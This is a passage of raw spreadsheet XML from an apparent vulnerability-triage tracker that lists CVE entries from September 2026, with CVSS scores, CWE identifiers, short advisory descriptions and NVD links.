t="n"><v>0.003</v></c><c r="I1155" s="5" t="inlineStr" /><c r="J1155" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1155" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1155" s="5" t="inlineStr" /><c r="M1155" s="5" t="inlineStr" /><c r="N1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1155" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1155" s="5" t="inlineStr" /><c r="R1155" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="S1155" s="5" t="inlineStr"><is><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is></c><c r="T1155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t></is></c></row><row r="1156"><c r="A1156" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1156" s="5" t="inlineStr"><is><t>CVE-2026-84282</t></is></c><c r="D1156" s="5" t="n"><v>6.5</v></c><c r="E1156" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1156" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1156" s="5" t="inlineStr" /><c r="H1156" s="5" t="n"><v>0.002</v></c><c r="I1156" s="5" t="inlineStr" /><c r="J1156" s="5" t="inlineStr" /><c r="K1156" s="5" t="inlineStr" /><c r="L1156" s="5" t="inlineStr" /><c r="M1156" s="5" t="inlineStr" /><c r="N1156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1156" s="5" t="inlineStr" /><c r="R1156" s="5" t="inlineStr" /><c r="S1156" s="5" t="inlineStr"><is><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is></c><c r="T1156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84282</t></is></c></row><row r="1157"><c r="A1157" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1157" s="5" t="inlineStr"><is><t>CVE-2026-84391</t></is></c><c r="D1157" s="5" t="n"><v>6.5</v></c><c r="E1157" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1157" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1157" s="5" t="inlineStr" /><c r="H1157" s="5" t="n"><v>0.002</v></c><c r="I1157" s="5" t="inlineStr" /><c r="J1157" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1157" s="5" t="inlineStr" /><c r="L1157" s="5" t="inlineStr" /><c r="M1157" s="5" t="inlineStr" /><c r="N1157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1157" s="5" t="inlineStr" /><c r="R1157" s="5" t="inlineStr"><is><t>CWE-457</t></is></c><c r="S1157" s="5" t="inlineStr"><is><t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t></is></c><c r="T1157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t></is></c></row><row r="1158"><c r="A1158" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1158" s="5" t="inlineStr"><is><t>CVE-2026-84685</t></is></c><c r="D1158" s="5" t="n"><v>6.5</v></c><c r="E1158" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1158" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1158" s="5" t="inlineStr" /><c r="H1158" s="5" t="n"><v>0.002</v></c><c r="I1158" s="5" t="inlineStr" /><c r="J1158" s="5" t="inlineStr" /><c r="K1158" s="5" t="inlineStr" /><c r="L1158" s="5" t="inlineStr" /><c r="M1158" s="5" t="inlineStr" /><c r="N1158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1158" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1158" s="5" t="inlineStr" /><c r="R1158" s="5" t="inlineStr"><is><t>CWE-488</t></is></c><c r="S1158" s="5" t="inlineStr"><is><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is></c><c r="T1158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84685</t></is></c></row><row r="1159"><c r="A1159" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1159" s="5" t="inlineStr"><is><t>CVE-2026-86077</t></is></c><c r="D1159" s="5" t="n"><v>6.5</v></c><c r="E1159" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1159" s="5" t="inlineStr" /><c r="H1159" s="5" t="n"><v>0.003</v></c><c r="I1159" s="5" t="inlineStr" /><c r="J1159" s="5" t="inlineStr" /><c r="K1159" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1159" s="5" t="inlineStr" /><c r="M1159" s="5" t="inlineStr" /><c r="N1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1159" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1159" s="5" t="inlineStr" /><c r="R1159" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1159" s="5" t="inlineStr"><is><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is></c><c r="T1159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86077</t></is></c></row><row r="1160"><c r="A1160" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1160" s="5" t="inlineStr"><is><t>CVE-2026-86078</t></is></c><c r="D1160" s="5" t="n"><v>6.5</v></c><c r="E1160" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1160" s="5" t="inlineStr" /><c r="H1160" s="5" t="n"><v>0.003</v></c><c r="I1160" s="5" t="inlineStr" /><c r="J1160" s="5" t="inlineStr" /><c r="K1160" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1160" s="5" t="inlineStr" /><c r="M1160" s="5" t="inlineStr" /><c r="N1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1160" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1160" s="5" t="inlineStr" /><c r="R1160" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1160" s="5" t="inlineStr"><is><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is></c><c r="T1160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86078</t></is></c></row><row r="1161"><c r="A1161" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1161" s="5" t="inlineStr"><is><t>CVE-2026-86079</t></is></c><c r="D1161" s="5" t="n"><v>6.5</v></c><c r="E1161" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1161" s="5" t="inlineStr" /><c r="H1161" s="5" t="n"><v>0.003</v></c><c r="I1161" s="5" t="inlineStr" /><c r="J1161" s="5" t="inlineStr" /><c r="K1161" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1161" s="5" t="inlineStr" /><c r="M1161" s="5" t="inlineStr" /><c r="N1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1161" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1161" s="5" t="inlineStr" /><c r="R1161" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1161" s="5" t="inlineStr"><is><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is></c><c r="T1161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86079</t></is></c></row><row r="1162"><c r="A1162" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1162" s="5" t="inlineStr"><is><t>CVE-2026-86082</t></is></c><c r="D1162" s="5" t="n"><v>6.5</v></c><c r="E1162" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1162" s="5" t="inlineStr" /><c r="H1162" s="5" t="n"><v>0.002</v></c><c r="I1162" s="5" t="inlineStr" /><c r="J1162" s="5" t="inlineStr" /><c r="K1162" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1162" s="5" t="inlineStr" /><c r="M1162" s="5" t="inlineStr" /><c r="N1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1162" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1162" s="5" t="inlineStr" /><c r="R1162" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1162" s="5" t="inlineStr"><is><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is></c><c r="T1162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86082</t></is></c></row><row r="1163"><c r="A1163" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1163" s="5" t="inlineStr"><is><t>CVE-2026-86550</t></is></c><c r="D1163" s="5" t="n"><v>6.5</v></c><c r="E1163" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1163" s="5" t="inlineStr"><is><t>psirt@zte.com.cn</t></is></c><c r="G1163" s="5" t="inlineStr" /><c r="H1163" s="5" t="n"><v>0.003</v></c><c r="I1163" s="5" t="inlineStr" /><c r="J1163" s="5" t="inlineStr" /><c r="K1163" s="5" t="inlineStr" /><c r="L1163" s="5" t="inlineStr" /><c r="M1163" s="5" t="inlineStr" /><c r="N1163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1163" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1163" s="5" t="inlineStr" /><c r="R1163" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1163" s="5" t="inlineStr"><is><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is></c><c r="T1163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86550</t></is></c></row><row r="1164"><c r="A1164" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1164" s="5" t="inlineStr"><is><t>CVE-2026-86597</t></is></c><c r="D1164" s="5" t="n"><v>6.5</v></c><c r="E1164" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1164" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G1164" s="5" t="inlineStr" /><c r="H1164" s="5" t="n"><v>0.001</v></c><c r="I1164" s="5" t="inlineStr" /><c r="J1164" s="5" t="inlineStr" /><c r="K1164" s="5" t="inlineStr" /><c r="L1164" s="5" t="inlineStr" /><c r="M1164" s="5" t="inlineStr" /><c r="N1164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1164" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1164" s="5" t="inlineStr" /><c r="R1164" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1164" s="5" t="inlineStr"><is><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is></c><c r="T1164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86597</t></is></c></row><row r="1165"><c r="A1165" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1165" s="5" t="inlineStr"><is><t>CVE-2026-86726</t></is></c><c r="D1165" s="5" t="n"><v>6.5</v></c><c r="E1165" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1165" s="5" t="inlineStr" /><c r="H1165" s="5" t="n"><v>0.003</v></c><c r="I1165" s="5" t="inlineStr" /><c r="J1165" s="5" t="inlineStr" /><c r="K1165" s="5" t="inlineStr" /><c r="L1165" s="5" t="inlineStr" /><c r="M1165" s="5" t="inlineStr" /><c r="N1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1165" s="5" t="inlineStr" /><c r="R1165" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1165" s="5" t="inlineStr"><is><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is></c><c r="T1165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86726</t></is></c></row><row r="1166"><c r="A1166" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1166" s="5" t="inlineStr"><is><t>CVE-2026-86731</t></is></c><c r="D1166" s="5" t="n"><v>6.5</v></c><c r="E1166" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1166" s="5" t="inlineStr" /><c r="H1166" s="5" t="n"><v>0.002</v></c><c r="I1166" s="5" t="inlineStr" /><c r="J1166" s="5" t="inlineStr" /><c r="K1166" s="5" t="inlineStr" /><c r="L1166" s="5" t="inlineStr" /><c r="M1166" s="5" t="inlineStr" /><c r="N1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1166" s="5" t="inlineStr" /><c r="R1166" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1166" s="5" t="inlineStr"><is><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is></c><c r="T1166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86731</t></is></c></row><row r="1167"><c r="A1167" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1167" s="5" t="inlineStr"><is><t>CVE-2026-12230</t></is></c><c r="D1167" s="5" t="n"><v>6.4</v></c><c r="E1167" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1167" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1167" s="5" t="inlineStr" /><c r="H1167" s="5" t="n"><v>0.002</v></c><c r="I1167" s="5" t="inlineStr" /><c r="J1167" s="5" t="inlineStr" /><c r="K1167" s="5" t="inlineStr" /><c r="L1167" s="5" t="inlineStr" /><c r="M1167" s="5" t="inlineStr" /><c r="N1167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1167" s="5" t="inlineStr" /><c r="R1167" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1167" s="5" t="inlineStr"><is><t>The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'layout_custom_css' parameter in all versions up to, and including, 4.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t></is></c><c r="T1167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12230</t></is></c></row><row r="1168"><c r="A1168" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1168" s="5" t="inlineStr"><is><t>CVE-2026-33388</t></is></c><c r="D1168" s="5" t="n"><v>6.4</v></c><c r="E1168" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1168" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1168" s="5" t="inlineStr" /><c r="H1168" s="5" t="n"><v>0.003</v></c><c r="I1168" s="5" t="inlineStr" /><c r="J1168" s="5" t="inlineStr" /><c r="K1168" s="5" t="inlineStr" /><c r="L1168" s="5" t="inlineStr" /><c r="M1168" s="5" t="inlineStr" /><c r="N1168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1168" s="5" t="inlineStr" /><c r="R1168" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1168" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Credentials Manager functionality due to insufficient validation of user privileges. A remote authenticated user with limited privileges can view a limited subset of the available entries in the Credentials Manager. The actual credential values are not directly visible, but the user can delete entries or edit their properties. An attacker who deletes or edits an entry can disrupt authentication for dependent devices, and one who manipulates an entry's configuration may be able to indirectly obtain the credentials.</t></is></c><c r="T1168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33388</t></is></c></row><row r="1169"><c r="A1169" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1169" s="5" t="inlineStr"><is><t>CVE-2026-69874</t></is></c><c r="D1169" s="5" t="n"><v>6.4</v></c><c r="E1169" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1169" s="5" t="inlineStr" /><c r="H1169" s="5" t="n"><v>0.003</v></c><c r="I1169" s="5" t="inlineStr" /><c r="J1169" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1169"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169" s="5" t="inlineStr" /><c r="M1169" s="5" t="inlineStr" /><c r="N1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1169" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1169" s="5" t="inlineStr" /><c r="R1169" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1169" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t></is></c></row><row r="1170"><c r="A1170" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1170" s="5" t="inlineStr"><is><t>CVE-2026-69878</t></is></c><c r="D1170" s="5" t="n"><v>6.4</v></c><c r="E1170" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1170" s="5" t="inlineStr" /><c r="H1170" s="5" t="n"><v>0.003</v></c><c r="I1170" s="5" t="inlineStr" /><c r="J1170" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1170" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1170" s="5" t="inlineStr" /><c r="M1170" s="5" t="inlineStr" /><c r="N1170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1170" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1170" s="5" t="inlineStr" /><c r="R1170" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1170" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t></is></c></row><row r="1171"><c r="A1171" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1171" s="5" t="inlineStr"><is><t>CVE-2026-70582</t></is></c><c r="D1171" s="5" t="n"><v>6.4</v></c><c r="E1171" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1171" s="5" t="inlineStr" /><c r="H1171" s="5" t="n"><v>0.002</v></c><c r="I1171" s="5" t="inlineStr" /><c r="J1171" s="5" t="inlineStr" /><c r="K1171" s="5" t="inlineStr" /><c r="L1171" s="5" t="inlineStr" /><c r="M1171" s="5" t="inlineStr" /><c r="N1171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1171" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1171" s="5" t="inlineStr" /><c r="R1171" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1171" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70582</t></is></c></row><row r="1172"><c r="A1172" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1172" s="5" t="inlineStr"><is><t>CVE-2026-71338</t></is></c><c r="D1172" s="5" t="n"><v>6.4</v></c><c r="E1172" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1172" s="5" t="inlineStr" /><c r="H1172" s="5" t="n"><v>0.003</v></c><c r="I1172" s="5" t="inlineStr" /><c r="J1172" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1172" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1172" s="5" t="inlineStr" /><c r="M1172" s="5" t="inlineStr" /><c r="N1172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1172" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1172" s="5" t="inlineStr" /><c r="R1172" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1172" s="5" t="inlineStr"><is><t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t></is></c></row><row r="1173"><c r="A1173" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1173" s="5" t="inlineStr"><is><t>CVE-2026-72947</t></is></c><c r="D1173" s="5" t="n"><v>6.4</v></c><c r="E1173" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1173" s="5" t="inlineStr" /><c r="H1173" s="5" t="n"><v>0.003</v></c><c r="I1173" s="5" t="inlineStr" /><c r="J1173" s="5" t="inlineStr" /><c r="K1173" s="5" t="inlineStr" /><c r="L1173" s="5" t="inlineStr" /><c r="M1173" s="5" t="inlineStr" /><c r="N1173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1173" s="5" t="inlineStr" /><c r="R1173" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1173" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72947</t></is></c></row><row r="1174"><c r="A1174" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1174" s="5" t="inlineStr"><is><t>CVE-2026-76931</t></is></c><c r="D1174" s="5" t="n"><v>6.4</v></c><c r="E1174" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1174" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1174" s="5" t="inlineStr" /><c r="H1174" s="5" t="n"><v>0.002</v></c><c r="I1174" s="5" t="inlineStr" /><c r="J1174" s="5" t="inlineStr" /><c r="K1174" s="5" t="inlineStr" /><c r="L1174" s="5" t="inlineStr" /><c r="M1174" s="5" t="inlineStr" /><c r="N1174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1174" s="5" t="inlineStr" /><c r="R1174" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1174" s="5" t="inlineStr"><is><t>The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 3.3.205 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can only be exploited when the 'Directly link to project' plugin setting is disabled.</t></is></c><c r="T1174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76931</t></is></c></row><row r="1175"><c r="A1175" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1175" s="5" t="inlineStr"><is><t>CVE-2026-77887</t></is></c><c r="D1175" s="5" t="n"><v>6.4</v></c><c r="E1175" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1175" s="5" t="inlineStr" /><c r="H1175" s="5" t="n"><v>0.002</v></c><c r="I1175" s="5" t="inlineStr" /><c r="J1175" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1175" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1175" s="5" t="inlineStr" /><c r="M1175" s="5" t="inlineStr" /><c r="N1175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1175" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1175" s="5" t="inlineStr" /><c r="R1175" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1175" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t></is></c></row><row r="1176"><c r="A1176" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1176" s="5" t="inlineStr"><is><t>CVE-2026-77891</t></is></c><c r="D1176" s="5" t="n"><v>6.4</v></c><c r="E1176" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1176" s="5" t="inlineStr" /><c r="H1176" s="5" t="n"><v>0.002</v></c><c r="I1176" s="5" t="inlineStr" /><c r="J1176" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1176" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1176" s="5" t="inlineStr" /><c r="M1176" s="5" t="inlineStr" /><c r="N1176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1176" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1176" s="5" t="inlineStr" /><c r="R1176" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1176" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized 